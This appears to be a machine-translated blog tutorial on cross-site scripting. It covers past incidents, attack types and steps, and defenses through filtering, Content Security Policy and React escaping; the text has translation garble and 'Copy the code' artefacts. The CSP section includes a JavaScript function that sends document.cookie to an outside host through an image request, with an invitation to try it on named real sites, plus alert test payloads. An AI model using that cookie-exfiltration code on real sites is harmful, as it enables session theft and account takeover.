On April 30, 2011, renren.com suffered an XSS attack. On June 28, 2011, Sina Weibo was attacked by XSS. After being attacked, weibo users would automatically send poisonous private messages and micro-blogs to their fans. Some users would be poisoned again after clicking, forming a vicious circle
I. Introduction to XSS attacks
1. Introduction
XSS attacks refer to malicious Scripting, which takes advantage of vulnerabilities in the development of Web pages and inserts malicious Script code into Web pages. Script code embedded in the Web will be executed when users browse. So as to achieve the purpose of malicious attack users
Harm 2.
According to OWASP(OWASP is the world’s most famous Web security and database security research organization) statistics in recent years, XSS accounts for 22% of all Web attacks, ranking the top of all Web threats
- Traffic was hijacked
- Obtain users’ cookie information and steal accounts
- Tamper with or delete page information
- Cooperate with CSRF attacks to carry out further attacks
- · · · · · ·
XSS attack types
1. Storage XSS
- Stored XSS browsing is triggered
2. Reflective XSS - Reflective XSS needs to be triggered by deceiving users (Zhihu and JINGdong have escaped and will be triggered if there is no escape)
XSS attack process
1. Look for bugs
- Voice mail system
- Mail system
- Review system
- Rich text editor
These are all “hot spots” for XSS attacks because they all have something in common:
2. Construct attack code
3. Inject code
- PS: Don’t try, this vulnerability has been fixed
- Postman modifies the submission data to simulate sending
- The whole process of XSS to verify whether the attack is effective is summarized as follows:
Iv. XSS prevention
1. Special character filtering
< script > < script > < style > < / style > a, href | events, img SRC | events style = "width: expression (XXX)"Copy the codeYou are advised to introduce the XSS NPM module jsxss.com/zh/index.ht…
The import XSS from 'XSS; Const HTML = XSS (' < script > alert (" XSS ") < / script > ")Copy the code
2. The introduction of CSP
Content Security Policy is essentially a whitelist system, in which developers clearly tell clients which external resources can be loaded and executed, greatly enhancing the Security of web pages.
-
The client Settings
<meta http-equiv="Content-Security-Policy" content="default-src *.meituan.com imeituan://* *.dianping.com 'self' 'unsafe - the inline' 'unsafe - eval' ">Copy the code -
Server Settings
SetHeader (' Content - Security - the Policy ', //* *. Dianping.com 'self' 'unsafe-inline' 'unsafe-eval')Copy the code -
CSP browser compatibility, Android and IE support is not ideal
If you’re interested, you can find it herewaimai.meituan.comandele.meTest the following code to see what happensfunction sendCookie(){ var img = document.createElement('img'); img.src = 'https://keycode.me? cookie=' + document.cookie; document.body.appendChild(img); document.body.removeChild(img); } sendCookie();Copy the code
It’s not preventing XSS, it’s preventing XSS from further harm. For more information about CSP, please visit www.w3.org/TR/CSP1/
3. XSS and React
JSX Prevents Injection Attacks JSX Prevents Injection Attacks
- By default, React DOM escapes any values embedded in JSX before rendering them. Thus it ensures that you can never inject anything That’s not explicitly written in your application. Everything is in line to a string before being rendered. This helps Prevent XSS attacks. Facebook. Making. IO/react/docs /…
- However, things are not absolute, in the use of dangerouslySetInnerHTML injection HTML should also pay attention to filtering special characters
The < div dangerouslySetInnerHTML = {{__html: ` < script > alert (' XSS) < / script > `}} / >Copy the code